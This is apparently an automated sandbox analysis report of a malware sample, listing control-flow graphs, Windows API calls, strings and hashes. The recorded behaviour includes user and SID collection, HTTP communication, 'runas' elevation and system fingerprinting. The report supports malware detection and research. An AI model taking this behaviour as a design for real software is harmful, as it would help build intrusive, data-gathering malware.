                                                                                • API String ID: 3335310882-2138744902
                                                                                • Opcode ID: c29f51bd262eba5ef4b63da8da75613b1bf171c78fe3e062c76727c336a480f4
                                                                                • Instruction ID: cb416ccc8d4420a903fbb3b55177e7287d68d7c58012d2f00f8f6b9c9a0f1f54
                                                                                • Opcode Fuzzy Hash: c29f51bd262eba5ef4b63da8da75613b1bf171c78fe3e062c76727c336a480f4
                                                                                • Instruction Fuzzy Hash: 1BA23A71A001544BEB28DB28CD897DDBA32AF85305F1082EDE409A73D6DB7D9BC48F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1088 402c50-402ca7 GetUserNameW GetProcessHeap HeapAlloc GetUserNameW 1089 402e12-402e41 GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap HeapFree LocalFree 1088->1089 1090 402cad-402cef LookupAccountNameW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 1088->1090 1090->1089 1091 402cf5-402cf7 1090->1091 1091->1089 1092 402cfd-402d16 LookupAccountNameW 1091->1092 1092->1089 1093 402d1c-402d29 ConvertSidToStringSidW 1092->1093 1093->1089 1094 402d2f-402d34 1093->1094 1095 402d37-402d40 1094->1095 1095->1095 1096 402d42-402d5b call 4131b9 1095->1096 1099 402d7b-402d8f 1096->1099 1100 402d5d-402d60 1096->1100 1102 402d92-402d97 1099->1102 1101 402d63-402d73 1100->1101 1101->1101 1103 402d75 1101->1103 1102->1102 1104 402d99-402ddf call 412440 * 2 1102->1104 1103->1099 1105 402d77-402d79 1103->1105 1110 402de1-402ded 1104->1110 1111 402e09-402e11 1104->1111 1105->1099 1105->1101 1112 402dff-402e06 call 4131ab 1110->1112 1113 402def-402dfd 1110->1113 1112->1111 1113->1112 1115 402e42-402e47 call 417eb2 1113->1115
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00402C7A
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00402C8F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402C92
                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00402CA0
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402CC3
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00402CCE
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402CD1
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00402CE1
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402CE4
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402D0E
                                                                                • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00402D21
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00402E15
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E1E
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402E23
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E26
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402E2D
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E30
                                                                                • LocalFree.KERNEL32(00000000), ref: 00402E35
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                • String ID:
                                                                                • API String ID: 3326663573-0
                                                                                • Opcode ID: bbf60ad73f4f0b1907d464343105196cf1363c4575f22fb86427151020379b51
                                                                                • Instruction ID: 1f2fa1d56028b28db954e0c145b467a995226bc7c5205bb4d9c734eff09e26a8
                                                                                • Opcode Fuzzy Hash: bbf60ad73f4f0b1907d464343105196cf1363c4575f22fb86427151020379b51
                                                                                • Instruction Fuzzy Hash: 37519271A00209AFDB15DFA5DD88BEFBB78EF44304F10416AE905B3281DB749E45CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1119 407fcb-407fcf 1120 407fd5-407fd9 1119->1120 1121 40830d-408330 call 412440 1119->1121 1120->1121 1123 407fdf-40804d InternetOpenW InternetConnectA call 4120d0 call 402150 1120->1123 1126 408332-40833e 1121->1126 1127 40835a-408372 1121->1127 1146 408051-408071 HttpOpenRequestA 1123->1146 1147 40804f 1123->1147 1129 408350-408357 call 4131ab 1126->1129 1130 408340-40834e 1126->1130 1132 4082c4-4082dc 1127->1132 1133 408378-408384 1127->1133 1129->1127 1130->1129 1136 4083bc-4083c1 call 417eb2 1130->1136 1134 4082e2-4082ee 1132->1134 1135 4083a9-4083b1 1132->1135 1139 4082ba-4082c1 call 4131ab 1133->1139 1140 40838a-408398 1133->1140 1142 4082f4-408302 1134->1142 1143 40839f-4083a6 call 4131ab 1134->1143 1139->1132 1140->1136 1141 40839a 1140->1141 1141->1139 1142->1136 1151 408308 1142->1151 1143->1135 1153 408073-40807f 1146->1153 1154 40809f-4080d8 call 4120d0 call 402150 1146->1154 1147->1146 1151->1143 1155 408081-40808f 1153->1155 1156 408095-40809c call 4131ab 1153->1156 1168 4080da-4080dc 1154->1168 1169 4080df-408115 call 4120d0 call 402150 HttpSendRequestA 1154->1169 1155->1156 1159 4083b2 call 417eb2 1155->1159 1156->1154 1165 4083b7 call 417eb2 1159->1165 1165->1136 1168->1169 1174 408143-408153 1169->1174 1175 408117-408123 1169->1175 1178 408181-40819c InternetReadFile 1174->1178 1179 408155-408161 1174->1179 1176 408125-408133 1175->1176 1177 408139-408140 call 4131ab 1175->1177 1176->1165 1176->1177 1177->1174 1183 4081a2-4081a7 1178->1183 1184 408224-408250 InternetCloseHandle * 3 1178->1184 1181 408163-408171 1179->1181 1182 408177-40817e call 4131ab 1179->1182 1181->1165 1181->1182 1182->1178 1189 408221 1183->1189 1190 4081a9-4081b0 1183->1190 1186 408252-40825e 1184->1186 1187 40827e-408296 1184->1187 1191 408260-40826e 1186->1191 1192 408274-40827b call 4131ab 1186->1192 1187->1132 1194 408298-4082a4 1187->1194 1189->1184 1195 4081b2-4081d8 call 414cc0 1190->1195 1196 4081da-4081ec call 4128e0 1190->1196 1191->1136 1191->1192 1192->1187 1194->1139 1199 4082a6-4082b4 1194->1199 1201 4081f1-408217 InternetReadFile 1195->1201 1196->1201 1199->1136 1199->1139 1201->1189 1204 408219-40821f 1201->1204 1204->1183
                                                                                APIs
                                                                                • InternetOpenW.WININET(00431D60,00000000,00000000,00000000,00000000), ref: 00407FF9
                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00408018
                                                                                • HttpOpenRequestA.WININET(?,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00408062
                                                                                • HttpSendRequestA.WININET(?,?,?), ref: 00408109
                                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 00408194
                                                                                • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040820F
                                                                                • InternetCloseHandle.WININET(?), ref: 0040822D
                                                                                • InternetCloseHandle.WININET(?), ref: 00408232
                                                                                • InternetCloseHandle.WININET(?), ref: 00408237
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                                • String ID: B3B184B6
                                                                                • API String ID: 1354133546-1388886651
                                                                                • Opcode ID: c49c2f5116abc487cc915d3f080b49d4f91dc6cac6a430ff664894b7f12783d7
                                                                                • Instruction ID: 509f89d8c49d1ab15b1404276eb16bb215d4ddd1b2d399db649dd0bff0d0c643
                                                                                • Opcode Fuzzy Hash: c49c2f5116abc487cc915d3f080b49d4f91dc6cac6a430ff664894b7f12783d7
                                                                                • Instruction Fuzzy Hash: 79C1D571A00108ABEB14DF68CE85BDE7F75EF85304F50416EF854A72D1DB399A81CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1588 4219a1-4219c9 call 4215bd call 42161b 1593 421b6f-421ba4 call 417ecf call 4215bd call 42161b 1588->1593 1594 4219cf-4219db call 4215c3 1588->1594 1618 421baa-421bb6 call 4215c3 1593->1618 1619 421ccc-421d28 call 417ecf call 424bae 1593->1619 1594->1593 1599 4219e1-4219ec 1594->1599 1601 421a22-421a2b call 419831 1599->1601 1602 4219ee-4219f0 1599->1602 1613 421a2e-421a33 1601->1613 1605 4219f2-4219f6 1602->1605 1608 421a12-421a14 1605->1608 1609 4219f8-4219fa 1605->1609 1611 421a17-421a19 1608->1611 1614 421a0e-421a10 1609->1614 1615 4219fc-421a02 1609->1615 1616 421b6b-421b6e 1611->1616 1617 421a1f 1611->1617 1613->1613 1620 421a35-421a56 call 419d1a call 419831 1613->1620 1614->1611 1615->1608 1621 421a04-421a0c 1615->1621 1617->1601 1618->1619 1628 421bbc-421bc8 call 4215ef 1618->1628 1638 421d32-421d35 1619->1638 1639 421d2a-421d30 1619->1639 1620->1616 1636 421a5c-421a5f 1620->1636 1621->1605 1621->1614 1628->1619 1637 421bce-421bef call 419831 GetTimeZoneInformation 1628->1637 1640 421a62-421a67 1636->1640 1653 421bf5-421c16 1637->1653 1654 421caa-421ccb call 4215b7 call 4215ab call 4215b1 1637->1654 1641 421d37-421d47 call 419d1a 1638->1641 1642 421d78-421d8a 1638->1642 1639->1642 1640->1640 1644 421a69-421a7b call 418f7c 1640->1644 1659 421d51-421d6a call 424bae 1641->1659 1660 421d49 1641->1660 1647 421d9a 1642->1647 1648 421d8c-421d8f 1642->1648 1644->1593 1657 421a81-421a94 call 424157 1644->1657 1650 421d9f-421db4 call 419831 call 4139d2 1647->1650 1651 421d9a call 421b7c 1647->1651 1648->1647 1655 421d91-421d98 call 4219a1 1648->1655 1651->1650 1661 421c20-421c27 1653->1661 1662 421c18-421c1d 1653->1662 1655->1650 1657->1593 1682 421a9a-421a9d 1657->1682 1685 421d6f-421d75 call 419831 1659->1685 1686 421d6c-421d6d 1659->1686 1669 421d4a-421d4f call 419831 1660->1669 1671 421c39-421c3b 1661->1671 1672 421c29-421c30 1661->1672 1662->1661 1692 421d77 1669->1692 1673 421c3d-421c66 call 41f913 call 41f00b 1671->1673 1672->1671 1679 421c32-421c37 1672->1679 1700 421c74-421c76 1673->1700 1701 421c68-421c6b 1673->1701 1679->1673 1690 421aa5-421aab 1682->1690 1691 421a9f-421aa3 1682->1691 1685->1692 1686->1669 1696 421aae-421abb call 4179b2 1690->1696 1697 421aad 1690->1697 1691->1682 1691->1690 1692->1642 1705 421abe-421ac3 1696->1705 1697->1696 1704 421c78-421c96 call 41f00b 1700->1704 1701->1700 1703 421c6d-421c72 1701->1703 1703->1704 1711 421ca5-421ca8 1704->1711 1712 421c98-421c9b 1704->1712 1707 421ac5-421aca 1705->1707 1708 421acc-421acd 1705->1708 1707->1708 1710 421acf-421ad2 1707->1710 1708->1705 1713 421b20-421b23 1710->1713 1714 421ad4-421aeb call 4179b2 1710->1714 1711->1654 1712->1711 1715 421c9d-421ca3 1712->1715 1716 421b25-421b27 1713->1716 1717 421b2a-421b3e 1713->1717 1722 421aff-421b01 1714->1722 1723 421aed 1714->1723 1715->1654 1716->1717 1720 421b40-421b50 call 424157 1717->1720 1721 421b54 1717->1721 1720->1593 1730 421b52 1720->1730 1724 421b57-421b69 call 4215b7 call 4215ab 1721->1724 1722->1713 1729 421b03-421b13 call 4179b2 1722->1729 1727 421aef-421af4 1723->1727 1724->1616 1727->1722 1731 421af6-421afd 1727->1731 1737 421b1a-421b1e 1729->1737 1730->1724 1731->1722 1731->1727 1737->1713 1738 421b15-421b17 1737->1738 1738->1713 1739 421b19 1738->1739 1739->1737
                                                                                APIs
                                                                                Strings
                                                                                • W. Europe Standard Time, xrefs: 00421C55
                                                                                • W. Europe Daylight Time, xrefs: 00421C84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$InformationTimeZone
                                                                                • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                • API String ID: 597776487-986674615
                                                                                • Opcode ID: 9c3159670546a0fe67b2d26441b9da20980b020d80fce58056df49f2e6230c34
                                                                                • Instruction ID: f38ec92d3ba7eadd921b68df47be3c0e113c6c55f6444b1f6c7a3c9226a89f73
                                                                                • Opcode Fuzzy Hash: 9c3159670546a0fe67b2d26441b9da20980b020d80fce58056df49f2e6230c34
                                                                                • Instruction Fuzzy Hash: 42C16A75B00225ABCB249F39E841AEF7BB99F61314FA440AFE44197361E7389E42C75C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1740 4034e0-4034fc 1741 403500-403505 1740->1741 1741->1741 1742 403507-403535 call 4131b9 1741->1742 1745 403537-40353f 1742->1745 1746 40355b-40356e 1742->1746 1747 403540-403553 1745->1747 1748 403571-403576 1746->1748 1747->1747 1749 403555 1747->1749 1748->1748 1750 403578-4035a2 call 4131b9 1748->1750 1749->1746 1751 403557-403559 1749->1751 1754 4035a4-4035ac 1750->1754 1755 4035cb-403625 1750->1755 1751->1746 1751->1747 1756 4035b0-4035c3 1754->1756 1757 403634 1755->1757 1758 403627-403632 1755->1758 1756->1756 1759 4035c5 1756->1759 1760 40363c-40364e ShellExecuteExW 1757->1760 1758->1757 1758->1760 1759->1755 1761 4035c7-4035c9 1759->1761 1762 403650-40365f 1760->1762 1763 403672-403678 1760->1763 1761->1755 1761->1756 1762->1763 1764 403661-403664 1762->1764 1765 4036a6-4036be 1763->1765 1766 40367a-403686 1763->1766 1764->1763 1769 403666-40366c WaitForSingleObject 1764->1769 1767 4036c0-4036cc 1765->1767 1768 4036ec-403704 1765->1768 1770 403688-403696 1766->1770 1771 40369c-4036a3 call 4131ab 1766->1771 1772 4036e2-4036e9 call 4131ab 1767->1772 1773 4036ce-4036dc 1767->1773 1774 403706-403712 1768->1774 1775 40372e-403746 1768->1775 1769->1763 1770->1771 1776 403779-4037cf call 417eb2 call 412440 call 4120d0 * 3 call 4034e0 1770->1776 1771->1765 1772->1768 1773->1772 1773->1776 1781 403724-40372b call 4131ab 1774->1781 1782 403714-403722 1774->1782 1783 403770-403778 1775->1783 1784 403748-403754 1775->1784 1803 4037d4-4037de 1776->1803 1781->1775 1782->1776 1782->1781 1788 403766-40376d call 4131ab 1784->1788 1789 403756-403764 1784->1789 1788->1783 1789->1776 1789->1788
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00403641
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040366C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteObjectShellSingleWait
                                                                                • String ID: <$@$runas
                                                                                • API String ID: 1289292659-2740324054
                                                                                • Opcode ID: 935c6bd0f5e5bbab709afb2f715ab91a81bf0dc936774632f78b90df3b7c683d
                                                                                • Instruction ID: f76b77160053bb3da01766da26ea8cecf252af4cc75a26f3f6749614eddad15e
                                                                                • Opcode Fuzzy Hash: 935c6bd0f5e5bbab709afb2f715ab91a81bf0dc936774632f78b90df3b7c683d
                                                                                • Instruction Fuzzy Hash: EA914671200340ABDB14CF38C98579E7FA6AF89345F508A2EF845973D5D779CA80CB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1880 405230-40528e call 413ef0 GetVersionExW 1883 405290-40529c 1880->1883 1884 40529d-4052bd call 4120d0 call 402150 1880->1884 1889 4052c1-4052df call 4120d0 call 402150 1884->1889 1890 4052bf 1884->1890 1895 4052e1 1889->1895 1896 4052e3-4052fa GetModuleHandleA GetProcAddress 1889->1896 1890->1889 1895->1896 1897 405328-405340 1896->1897 1898 4052fc-405308 1896->1898 1899 405342-40534e 1897->1899 1900 40536a-405382 1897->1900 1901 40530a-405318 1898->1901 1902 40531e-405325 call 4131ab 1898->1902 1903 405360-405367 call 4131ab 1899->1903 1904 405350-40535e 1899->1904 1905 405384-405386 GetNativeSystemInfo 1900->1905 1906 405388 GetSystemInfo 1900->1906 1901->1902 1907 4053bd-4053c2 call 417eb2 1901->1907 1902->1897 1903->1900 1904->1903 1904->1907 1910 40538e-405395 1905->1910 1906->1910 1915 4053b5-4053bc 1910->1915 1916 405397-40539f 1910->1916 1917 4053a1-4053ad 1916->1917 1918 4053ae-4053b1 1916->1918 1918->1915 1919 4053b3 1918->1919 1919->1915
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00405286
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004052E5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004052EC
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00405384
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                • String ID:
                                                                                • API String ID: 2167034304-0
                                                                                • Opcode ID: 91d46fb5c63d7810cc1c93e9f46c2e96aaac53c8b74b388684e82267ff8761de
                                                                                • Instruction ID: ba48a37b2361c0dd3631c2fdc5f6a64bfbfb4d374eb9e537ce3d947d4bdeb76a
                                                                                • Opcode Fuzzy Hash: 91d46fb5c63d7810cc1c93e9f46c2e96aaac53c8b74b388684e82267ff8761de
                                                                                • Instruction Fuzzy Hash: 3E414B70D102089BEB24ABA8DD4A7DEBB75EF45314F4042BEEC00A73C1E77959908BD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000137A4,0041329D), ref: 0041379D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: a518e237032a73c671d6fe6900a11de7500ab0f4a1156549394890eacbd6c240
                                                                                • Instruction ID: 29b736cd0aea69f67f96c391f878fa58e36a5c9e8a9fb7f159d6dd889a0d47bc
                                                                                • Opcode Fuzzy Hash: a518e237032a73c671d6fe6900a11de7500ab0f4a1156549394890eacbd6c240
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1205 420e27-420e57 call 420b75 1208 420e72-420e7e call 41afea 1205->1208 1209 420e59-420e64 call 416424 1205->1209 1215 420e80-420e95 call 416424 call 416437 1208->1215 1216 420e97-420ee0 call 420ae0 1208->1216 1214 420e66-420e6d call 416437 1209->1214 1225 42114c-421150 1214->1225 1215->1214 1223 420ee2-420eeb 1216->1223 1224 420f4d-420f56 GetFileType 1216->1224 1227 420f22-420f48 GetLastError call 416401 1223->1227 1228 420eed-420ef1 1223->1228 1229 420f58-420f89 GetLastError call 416401 CloseHandle 1224->1229 1230 420f9f-420fa2 1224->1230 1227->1214 1228->1227 1234 420ef3-420f20 call 420ae0 1228->1234 1229->1214 1244 420f8f-420f9a call 416437 1229->1244 1232 420fa4-420fa9 1230->1232 1233 420fab-420fb1 1230->1233 1237 420fb5-421003 call 41af35 1232->1237 1233->1237 1238 420fb3 1233->1238 1234->1224 1234->1227 1248 421022-42104a call 42088d 1237->1248 1249 421005-421011 call 420cef 1237->1249 1238->1237 1244->1214 1254 42104f-421090 1248->1254 1255 42104c-42104d 1248->1255 1249->1248 1256 421013 1249->1256 1258 421092-421096 1254->1258 1259 4210b1-4210bf 1254->1259 1257 421015-42101d call 419984 1255->1257 1256->1257 1257->1225 1258->1259 1260 421098-4210ac 1258->1260 1261 4210c5-4210c9 1259->1261 1262 42114a 1259->1262 1260->1259 1261->1262 1264 4210cb-4210fe CloseHandle call 420ae0 1261->1264 1262->1225 1268 421132-421146 1264->1268 1269 421100-42112c GetLastError call 416401 call 41b0fd 1264->1269 1268->1262 1269->1268
                                                                                APIs
                                                                                  • Part of subcall function 00420AE0: CreateFileW.KERNEL32(00000000,00000000,?,00420ED0,?,?,00000000,?,00420ED0,00000000,0000000C), ref: 00420AFD
                                                                                • GetLastError.KERNEL32 ref: 00420F3B
                                                                                • __dosmaperr.LIBCMT ref: 00420F42
                                                                                • GetFileType.KERNEL32(00000000), ref: 00420F4E
                                                                                • GetLastError.KERNEL32 ref: 00420F58
                                                                                • __dosmaperr.LIBCMT ref: 00420F61
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00420F81
                                                                                • CloseHandle.KERNEL32(004196CE), ref: 004210CE
                                                                                • GetLastError.KERNEL32 ref: 00421100
                                                                                • __dosmaperr.LIBCMT ref: 00421107
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: cf2c77a3dcd128d6262446101434c1499272d8e768c7107bd87c34c7b8fea853
                                                                                • Instruction ID: a9c50e62fe1c003193422340030df6aa95307796f034396d39d73d8aaaa7654f
                                                                                • Opcode Fuzzy Hash: cf2c77a3dcd128d6262446101434c1499272d8e768c7107bd87c34c7b8fea853
                                                                                • Instruction Fuzzy Hash: 49A11832A001648FCF199F68EC51BAE3BE1AF0A314F55415EE8119B3A2CB399952C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1274 404b50-404baf call 413ef0 GetVersionExW 1277 404bb1-404bb9 1274->1277 1278 404bba-404bda call 4120d0 call 402150 1274->1278 1283 404bdc 1278->1283 1284 404bde-404bfc call 4120d0 call 402150 1278->1284 1283->1284 1289 404c00-404c17 GetModuleHandleA GetProcAddress 1284->1289 1290 404bfe 1284->1290 1291 404c45-404c5d 1289->1291 1292 404c19-404c25 1289->1292 1290->1289 1293 404c8b-404ca3 1291->1293 1294 404c5f-404c6b 1291->1294 1295 404c27-404c35 1292->1295 1296 404c3b-404c42 call 4131ab 1292->1296 1299 404ca5-404ca7 GetNativeSystemInfo 1293->1299 1300 404ca9 GetSystemInfo 1293->1300 1297 404c81-404c88 call 4131ab 1294->1297 1298 404c6d-404c7b 1294->1298 1295->1296 1301 405208-405221 call 417eb2 1295->1301 1296->1291 1297->1293 1298->1297 1298->1301 1305 404caf-404cb8 1299->1305 1300->1305 1308 404cba-404cc1 1305->1308 1309 404cdf-404ce2 1305->1309 1311 404cc7-404cde 1308->1311 1312 4051fa-405207 1308->1312 1313 404ce8-404cf1 1309->1313 1314 40516d-405170 1309->1314 1316 404cf3-404d0c 1313->1316 1317 404d0d-404d10 1313->1317 1314->1312 1315 405176-40517f 1314->1315 1318 405181-40518b GetSystemMetrics 1315->1318 1319 4051c9-4051cc 1315->1319 1320 404d16-404d1d 1317->1320 1321 40512e-405130 1317->1321 1322 405199-40519d 1318->1322 1323 40518d-405197 1318->1323 1326 4051e6-4051f5 1319->1326 1327 4051ce-4051e5 1319->1327 1324 404d23-404d68 call 4120d0 call 402150 call 4120d0 call 402150 call 402380 1320->1324 1325 404dda-404e43 call 4120d0 call 402150 call 4120d0 call 402150 call 4120d0 call 402150 call 402380 1320->1325 1328 405132-405149 1321->1328 1329 40514a-40514d 1321->1329 1332 4051b0 1322->1332 1333 40519f-4051ae 1322->1333 1330 4051ba-4051c1 1323->1330 1354 404d6d-404d74 1324->1354 1369 404e45 1325->1369 1370 404e47-404e4d 1325->1370 1326->1312 1329->1312 1335 405153-40516c 1329->1335 1330->1312 1337 4051c3 1330->1337 1332->1330 1333->1330 1333->1332 1337->1319 1356 404d76 1354->1356 1357 404d78-404d92 call 4179b2 1354->1357 1356->1357 1362 404dc3-404dc5 1357->1362 1363 404d94-404da0 1357->1363 1367 404dcb-404dd5 1362->1367 1368 40511d-405126 1362->1368 1365 404da2-404db0 1363->1365 1366 404db6-404dc0 call 4131ab 1363->1366 1365->1366 1366->1362 1367->1368 1368->1314 1374 405128 1368->1374 1369->1370 1372 404e51-404e69 call 412800 1370->1372 1373 404e4f 1370->1373 1378 404e97-404eaf 1372->1378 1379 404e6b-404e77 1372->1379 1373->1372 1374->1321 1380 404eb1-404ebd 1378->1380 1381 404edd-404f57 call 4120d0 call 402150 call 4120d0 call 402150 call 4120d0 call 402150 call 402380 1378->1381 1382 404e79-404e87 1379->1382 1383 404e8d-404e94 call 4131ab 1379->1383 1385 404ed3-404eda call 4131ab 1380->1385 1386 404ebf-404ecd 1380->1386 1404 404f59 1381->1404 1405 404f5b-404f61 1381->1405 1382->1383 1383->1378 1385->1381 1386->1385 1404->1405 1406 404f63 1405->1406 1407 404f65-404f7d call 412800 1405->1407 1406->1407 1410 404fab-404fc3 1407->1410 1411 404f7f-404f8b 1407->1411 1412 404ff1-40506b call 4120d0 call 402150 call 4120d0 call 402150 call 4120d0 call 402150 call 402380 1410->1412 1413 404fc5-404fd1 1410->1413 1414 404fa1-404fa8 call 4131ab 1411->1414 1415 404f8d-404f9b 1411->1415 1436 40506d 1412->1436 1437 40506f-405075 1412->1437 1417 404fd3-404fe1 1413->1417 1418 404fe7-404fee call 4131ab 1413->1418 1414->1410 1415->1414 1417->1418 1418->1412 1436->1437 1438 405077 1437->1438 1439 405079-405091 call 412800 1437->1439 1438->1439 1442 405093-40509f 1439->1442 1443 4050bf-4050d7 1439->1443 1446 4050a1-4050af 1442->1446 1447 4050b5-4050bc call 4131ab 1442->1447 1444 405105-405118 1443->1444 1445 4050d9-4050e5 1443->1445 1444->1368 1449 4050e7-4050f5 1445->1449 1450 4050fb-405102 call 4131ab 1445->1450 1446->1447 1447->1443 1449->1450 1450->1444
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(0000011C,?,76C86490), ref: 00404BA7
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404C02
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00404C09
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00404CA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                • String ID: 95926298$9592629B$95926394
                                                                                • API String ID: 2167034304-2671370521
                                                                                • Opcode ID: 1bc9c3ce626455d54f6b2ef3673fe7f3083b5da37f7654282b6bdefa6a322e13
                                                                                • Instruction ID: df0449e883439d51ed97f444c0669631ee7618f66d79eebbc547106e60d973ea
                                                                                • Opcode Fuzzy Hash: 1bc9c3ce626455d54f6b2ef3673fe7f3083b5da37f7654282b6bdefa6a322e13
                                                                                • Instruction Fuzzy Hash: BC025870E001045BEB18EB68DD4679E7B62EF85304F1042BEE804AB3C2DB7D99918BD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
